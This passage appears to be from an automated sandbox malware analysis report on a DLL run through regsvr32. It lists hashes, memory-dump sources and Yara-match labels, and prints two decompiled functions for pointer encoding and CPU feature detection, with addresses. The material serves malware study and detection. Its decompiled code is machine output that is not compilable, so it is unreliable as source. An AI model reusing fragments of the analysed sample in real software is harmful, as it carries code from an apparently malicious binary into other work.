                                                                                                                                                                                                                    • Opcode ID: 7b26294f0f9f3284694c45c8b9595d0348109ce62e475cb7d6409abe9a76976a
                                                                                                                                                                                                                    • Instruction ID: f7e6c73e169b0e8a55b13dc96d5729a6c71944b6298cbacc077d854ab6f52e6e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7b26294f0f9f3284694c45c8b9595d0348109ce62e475cb7d6409abe9a76976a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7661307061464C8BDF28DF78D49A2AD3BE5FB44304F20613DEC669B2A6D774E906CB44
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 06da107516d47c143558e8aa98c820ad7c0c85d3c2a152159cfcced41356a87b
                                                                                                                                                                                                                    • Instruction ID: c2c96c44b259a6e3ff55f2e9713f3d93d15a5e006fe29e308af4e51959f0b73d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06da107516d47c143558e8aa98c820ad7c0c85d3c2a152159cfcced41356a87b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E711870508789CBDBF9CF24C8896DE7BE8FB88704F20461DE9998B2A0DB749645CF41
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390586641.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390580183.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390631909.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390642378.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390650965.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 24e3c0c76af823433cf272c9c4a9b61f0c82801c6157a6d7b247b40a6cf50061
                                                                                                                                                                                                                    • Instruction ID: 322fdb5d9cbd24f261f2202f975b2bd3e56ab6ee9c72a1ae6d0c4d2aba79015f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 24e3c0c76af823433cf272c9c4a9b61f0c82801c6157a6d7b247b40a6cf50061
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8411561F66BD947FF43DA7A5812BB00A00AFA77C0E41E312FD0B77B52EB28455A8200
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: ab1c614082465e9adf873fcd8bb0e59269149d5aae34c8c546b648bb5ab83c2f
                                                                                                                                                                                                                    • Instruction ID: 7588aa75b7a4557c6bcc218b06ed495d166dce7003a06a0a99c5f9fc48e4b124
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ab1c614082465e9adf873fcd8bb0e59269149d5aae34c8c546b648bb5ab83c2f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2551F670518788CBDBBADF34C8992D97BB1FB58304F90861DD84E8E290DB78574ACB45
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 56%
                                                                                                                                                                                                                    			E00000001180006818(signed int __edx, void* __edi, void* __esp, long long __rbx, signed long long*** __rcx, long long __rsi) {
                                                                                                                                                                                                                    				void* _t24;
                                                                                                                                                                                                                    				int _t26;
                                                                                                                                                                                                                    				signed int _t51;
                                                                                                                                                                                                                    				void* _t52;
                                                                                                                                                                                                                    				signed long long _t66;
                                                                                                                                                                                                                    				signed long long _t74;
                                                                                                                                                                                                                    				signed long long _t76;
                                                                                                                                                                                                                    				signed long long _t77;
                                                                                                                                                                                                                    				signed int* _t90;
                                                                                                                                                                                                                    				signed long long _t95;
                                                                                                                                                                                                                    				signed long long _t96;
                                                                                                                                                                                                                    				signed long long _t98;
                                                                                                                                                                                                                    				signed long long _t104;
                                                                                                                                                                                                                    				long long _t115;
                                                                                                                                                                                                                    				void* _t117;
                                                                                                                                                                                                                    				void* _t120;
                                                                                                                                                                                                                    				signed long long* _t123;
                                                                                                                                                                                                                    				signed long long _t124;
                                                                                                                                                                                                                    				signed long long _t126;
                                                                                                                                                                                                                    				signed long long _t129;
                                                                                                                                                                                                                    				signed long long*** _t132;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t52 = __edi;
                                                                                                                                                                                                                    				_t51 = __edx;
                                                                                                                                                                                                                    				 *((long long*)(_t117 + 8)) = __rbx;
                                                                                                                                                                                                                    				 *((long long*)(_t117 + 0x10)) = _t115;
                                                                                                                                                                                                                    				 *((long long*)(_t117 + 0x18)) = __rsi;
                                                                                                                                                                                                                    				_t66 =  *((intOrPtr*)(__rcx));
                                                                                                                                                                                                                    				_t132 = __rcx;
                                                                                                                                                                                                                    				_t90 =  *_t66;
                                                                                                                                                                                                                    				if (_t90 == 0) goto 0x800069ac;
                                                                                                                                                                                                                    				_t124 =  *0x80021010; // 0x4c25b7eca93e
                                                                                                                                                                                                                    				_t111 = _t124 ^  *_t90;
                                                                                                                                                                                                                    				asm("dec eax");
                                                                                                                                                                                                                    				_t74 = _t124 ^ _t90[4];
                                                                                                                                                                                                                    				asm("dec ecx");
                                                                                                                                                                                                                    				asm("dec eax");
                                                                                                                                                                                                                    				if ((_t124 ^ _t90[2]) != _t74) goto 0x8000691e;
                                                                                                                                                                                                                    				_t76 = _t74 - (_t124 ^  *_t90) >> 3;
                                                                                                                                                                                                                    				_t101 =  >  ? _t66 : _t76;
                                                                                                                                                                                                                    				_t6 = _t115 + 0x20; // 0x20
                                                                                                                                                                                                                    				_t102 = ( >  ? _t66 : _t76) + _t76;
                                                                                                                                                                                                                    				_t103 =  ==  ? _t66 : ( >  ? _t66 : _t76) + _t76;
                                                                                                                                                                                                                    				if (( ==  ? _t66 : ( >  ? _t66 : _t76) + _t76) - _t76 < 0) goto 0x800068ba;
                                                                                                                                                                                                                    				_t7 = _t115 + 8; // 0x8
                                                                                                                                                                                                                    				r8d = _t7;
                                                                                                                                                                                                                    				E0000000118000A344(_t6, _t76, _t111,  ==  ? _t66 : ( >  ? _t66 : _t76) + _t76, _t111, _t115, _t120);
                                                                                                                                                                                                                    				_t24 = E0000000118000878C(_t66, _t111);
                                                                                                                                                                                                                    				if (_t66 != 0) goto 0x800068e2;
                                                                                                                                                                                                                    				_t104 = _t76 + 4;
                                                                                                                                                                                                                    				r8d = 8;
                                                                                                                                                                                                                    				E0000000118000A344(_t24, _t76, _t111, _t104, _t111, _t115, _t120);
                                                                                                                                                                                                                    				_t129 = _t66;
                                                                                                                                                                                                                    				_t26 = E0000000118000878C(_t66, _t111);
                                                                                                                                                                                                                    				if (_t129 == 0) goto 0x800069ac;
                                                                                                                                                                                                                    				_t123 = _t129 + _t76 * 8;
                                                                                                                                                                                                                    				_t77 = _t129 + _t104 * 8;
                                                                                                                                                                                                                    				_t87 =  >  ? _t115 : _t77 - _t123 + 7 >> 3;
                                                                                                                                                                                                                    				_t64 =  >  ? _t115 : _t77 - _t123 + 7 >> 3;
                                                                                                                                                                                                                    				if (( >  ? _t115 : _t77 - _t123 + 7 >> 3) == 0) goto 0x8000691e;
                                                                                                                                                                                                                    				memset(_t52, _t26, 0 << 0);
                                                                                                                                                                                                                    				_t126 =  *0x80021010; // 0x4c25b7eca93e
                                                                                                                                                                                                                    				r8d = 0x40;
                                                                                                                                                                                                                    				asm("dec eax");
                                                                                                                                                                                                                    				 *_t123 =  *(_t132[1]) ^ _t126;
                                                                                                                                                                                                                    				_t95 =  *0x80021010; // 0x4c25b7eca93e
                                                                                                                                                                                                                    				asm("dec eax");
                                                                                                                                                                                                                    				 *( *( *_t132)) = _t129 ^ _t95;
                                                                                                                                                                                                                    				_t96 =  *0x80021010; // 0x4c25b7eca93e
                                                                                                                                                                                                                    				asm("dec eax");
                                                                                                                                                                                                                    				( *( *_t132))[1] =  &(_t123[1]) ^ _t96;
                                                                                                                                                                                                                    				_t98 =  *0x80021010; // 0x4c25b7eca93e
                                                                                                                                                                                                                    				r8d = r8d - (_t51 & 0x0000003f);
                                                                                                                                                                                                                    				asm("dec eax");
                                                                                                                                                                                                                    				( *( *_t132))[2] = _t77 ^ _t98;
                                                                                                                                                                                                                    				goto 0x800069af;
                                                                                                                                                                                                                    				return 0xffffffff;
                                                                                                                                                                                                                    			}
























                                                                                                                                                                                                                    0x180006818
                                                                                                                                                                                                                    0x180006818
                                                                                                                                                                                                                    0x180006818
                                                                                                                                                                                                                    0x18000681d
                                                                                                                                                                                                                    0x180006822
                                                                                                                                                                                                                    0x180006830
                                                                                                                                                                                                                    0x180006835
                                                                                                                                                                                                                    0x180006838
                                                                                                                                                                                                                    0x18000683e
                                                                                                                                                                                                                    0x180006844
                                                                                                                                                                                                                    0x180006851
                                                                                                                                                                                                                    0x18000685a
                                                                                                                                                                                                                    0x180006864
                                                                                                                                                                                                                    0x180006868
                                                                                                                                                                                                                    0x18000686b
                                                                                                                                                                                                                    0x180006871
                                                                                                                                                                                                                    0x18000687f
                                                                                                                                                                                                                    0x180006889
                                                                                                                                                                                                                    0x18000688d
                                                                                                                                                                                                                    0x180006890
                                                                                                                                                                                                                    0x180006893
                                                                                                                                                                                                                    0x18000689a
                                                                                                                                                                                                                    0x18000689c
                                                                                                                                                                                                                    0x18000689c
                                                                                                                                                                                                                    0x1800068a6
                                                                                                                                                                                                                    0x1800068b0
                                                                                                                                                                                                                    0x1800068b8
                                                                                                                                                                                                                    0x1800068ba
                                                                                                                                                                                                                    0x1800068be
                                                                                                                                                                                                                    0x1800068ca
                                                                                                                                                                                                                    0x1800068d1
                                                                                                                                                                                                                    0x1800068d4
                                                                                                                                                                                                                    0x1800068dc
                                                                                                                                                                                                                    0x1800068e9
                                                                                                                                                                                                                    0x1800068ed
                                                                                                                                                                                                                    0x180006905
                                                                                                                                                                                                                    0x180006909
                                                                                                                                                                                                                    0x18000690c
                                                                                                                                                                                                                    0x180006914
                                                                                                                                                                                                                    0x180006917
                                                                                                                                                                                                                    0x18000691e
                                                                                                                                                                                                                    0x18000693d
                                                                                                                                                                                                                    0x180006943
                                                                                                                                                                                                                    0x180006946
                                                                                                                                                                                                                    0x180006959
                                                                                                                                                                                                                    0x180006962
                                                                                                                                                                                                                    0x180006968
                                                                                                                                                                                                                    0x180006979
                                                                                                                                                                                                                    0x180006982
                                                                                                                                                                                                                    0x180006986
                                                                                                                                                                                                                    0x180006992
                                                                                                                                                                                                                    0x18000699b
                                                                                                                                                                                                                    0x1800069a6
                                                                                                                                                                                                                    0x1800069aa
                                                                                                                                                                                                                    0x1800069c7

                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390586641.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390580183.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390631909.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390642378.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390650965.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 485612231-0
                                                                                                                                                                                                                    • Opcode ID: 66125d16ff0b32e256dde8720e794326bf559e2f75bb0b9fe279f413c53e15a7
                                                                                                                                                                                                                    • Instruction ID: cb99d1167c8630c4161f8148837d3d56db0acdce36f97f7f4c16ea76a7bcc33d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 66125d16ff0b32e256dde8720e794326bf559e2f75bb0b9fe279f413c53e15a7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF41C272310A5886EF85CF6AD95479973A2B74CFD0F19D422EE4D97B68DE3CC2458300
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 7c06dbbd4d7f5d8b5a7dc781beb13b4593c6bbd5bd7959e7c7b22318daacb787
                                                                                                                                                                                                                    • Instruction ID: aa0b6a75fbd6c555abb278cb6b834df90668d2c3499fa237f2ebe661522d149d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7c06dbbd4d7f5d8b5a7dc781beb13b4593c6bbd5bd7959e7c7b22318daacb787
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C5128709047498BDF48CF68C8895DEBBF1FB48318F11835CE89AA7260D7B89A44CF49
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: ef86ec4cbab15db66684acca6e4eefc0d9a17a46b067acd768dfc4f73c7d9e5d
                                                                                                                                                                                                                    • Instruction ID: 172c0551a026c32434165ebb54fc3b69c44c0246fb70d3427b905e5300e0586d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef86ec4cbab15db66684acca6e4eefc0d9a17a46b067acd768dfc4f73c7d9e5d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E51C2B090474E8FDB48CF68D48A5DE7FB0FB68398F204619E81596250D7B4D6A5CFC0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: c42ee451b46e72c4fc1e7808b655d0298a624ad59252fa9ca8600e6c0870c205
                                                                                                                                                                                                                    • Instruction ID: a84a8a9728ebd607216ff82b69ee11dbf2fe2b5bd37d3b1c87aaafb47307fcd4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c42ee451b46e72c4fc1e7808b655d0298a624ad59252fa9ca8600e6c0870c205
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D351A4B090438E8FDB88CF68D88A5CE7BF0FB58358F105619F865A6250D3B8D664CF95
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 1190db60a81a9605ea1e1068c6cf6b0ac0731fea71818b2d4916113a12896c76
                                                                                                                                                                                                                    • Instruction ID: 40b77f0ab7583d742787e9a1fff51d4c1f689a0ce01a38f65178b2692db6ff12
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1190db60a81a9605ea1e1068c6cf6b0ac0731fea71818b2d4916113a12896c76
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 67519EB490438E8FDB48CF68C88A5DF7BB1FB58348F004A19E825A6250D3B8D665CF95
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 4555d26f65456cde840fc2f4c666a8d56836cf0868c008055827d07d980c0c85
                                                                                                                                                                                                                    • Instruction ID: c6d9242bdabae98003174c0d1220f246f16fb2a9ead13de744a35ee7b4f5caa5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4555d26f65456cde840fc2f4c666a8d56836cf0868c008055827d07d980c0c85
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BD41C2B090074E8FDB48DF64C48A5DE7FB0FB68388F104619E81AA6250D378D6A5CFC5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: c2ca811980bf69d3a725c6de3b3fc4f76b8583c10f578fbad8bf36fe51f88080
                                                                                                                                                                                                                    • Instruction ID: ffc56fd7168c6e695a14d31422796184757635042a1164aedc04677320af0710
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c2ca811980bf69d3a725c6de3b3fc4f76b8583c10f578fbad8bf36fe51f88080
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9B3175B052D781ABD38CDF28D59991ABBE1FB89304F806A2DF98687350D774D445CB07
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 830eef0a3232ecb80f2826221d342755302fd87f2307e2f844fd0bd61878f91c
                                                                                                                                                                                                                    • Instruction ID: efbb35fdfc96545695bc25e3bd00db16034c98cb8ef7f57b9f660a286bfd5c46
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 830eef0a3232ecb80f2826221d342755302fd87f2307e2f844fd0bd61878f91c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F315AB450C7848BD348DF28C54A51ABBE1BB8D309F404B5DF8CAAA360D778D615CB4B
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 2f0004951027548f87f8e7a2444adc3bba6861f54e8d6066d46ca53370045021
                                                                                                                                                                                                                    • Instruction ID: 623f27fec58fef4aaa379f7fbafc113b066f1698bb351901cc59bf5a19c6bb77
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f0004951027548f87f8e7a2444adc3bba6861f54e8d6066d46ca53370045021
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B218E70629380AFD388DF28D48981ABBF0BB89344F806A2DF8C68B360D775D445CB03
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 3eb31fd98d478cbf7892b0886e03ca27d91577c01988fac24f665ec931eb86f0
                                                                                                                                                                                                                    • Instruction ID: 199196ca8ace7e8d42d391659d5c3f2c80ec6c3440db0b61eb753a63f83db2a3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3eb31fd98d478cbf7892b0886e03ca27d91577c01988fac24f665ec931eb86f0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 622146B45187858BD349DF28D49941ABBE0FB8C31CF805B2DF4CAAA264D378D645CB0A
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                    			E000000011800070A0(intOrPtr __ebx, intOrPtr __edx, signed int __rax, signed int __rdx, void* __r8, signed long long _a8) {
                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                    				void* _t25;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t25 = __r8;
                                                                                                                                                                                                                    				r8d = 0;
                                                                                                                                                                                                                    				 *0x800223a8 = r8d;
                                                                                                                                                                                                                    				_t1 = _t25 + 1; // 0x1
                                                                                                                                                                                                                    				r9d = _t1;
                                                                                                                                                                                                                    				asm("cpuid");
                                                                                                                                                                                                                    				_v16 = r9d;
                                                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                                                    				_v20 = __ebx;
                                                                                                                                                                                                                    				_v12 = __edx;
                                                                                                                                                                                                                    				if (0 != 0x18001000) goto 0x80007101;
                                                                                                                                                                                                                    				asm("xgetbv");
                                                                                                                                                                                                                    				_a8 = __rdx << 0x00000020 | __rax;
                                                                                                                                                                                                                    				r8d =  *0x800223a8; // 0x1
                                                                                                                                                                                                                    				r8d =  ==  ? r9d : r8d;
                                                                                                                                                                                                                    				 *0x800223a8 = r8d;
                                                                                                                                                                                                                    				 *0x800223ac = r8d;
                                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                                    			}







                                                                                                                                                                                                                    0x1800070a0
                                                                                                                                                                                                                    0x1800070a6
                                                                                                                                                                                                                    0x1800070ab
                                                                                                                                                                                                                    0x1800070b2
                                                                                                                                                                                                                    0x1800070b2
                                                                                                                                                                                                                    0x1800070b9
                                                                                                                                                                                                                    0x1800070bb
                                                                                                                                                                                                                    0x1800070c3
                                                                                                                                                                                                                    0x1800070c9
                                                                                                                                                                                                                    0x1800070cd
                                                                                                                                                                                                                    0x1800070d3
                                                                                                                                                                                                                    0x1800070d7
                                                                                                                                                                                                                    0x1800070e1
                                                                                                                                                                                                                    0x1800070eb
                                                                                                                                                                                                                    0x1800070f6
                                                                                                                                                                                                                    0x1800070fa
                                                                                                                                                                                                                    0x180007101
                                                                                                                                                                                                                    0x18000710f

                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390586641.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390580183.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390631909.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390642378.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390650965.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: c9ee34aa5c89bc7d17368121c5bc84d136a52ab8ed5c42389172ea663d2f6f8f
                                                                                                                                                                                                                    • Instruction ID: 0b5ba2cec2f3816840067680c3456701fe7a71aa0eb5ae5909cae72e813b022f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c9ee34aa5c89bc7d17368121c5bc84d136a52ab8ed5c42389172ea663d2f6f8f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B2F062717142989EDBEACF6CA84275A77D0E30C3C0F90C029E6D983B04D63C82A48F44
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390586641.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390580183.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390631909.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390642378.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390650965.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
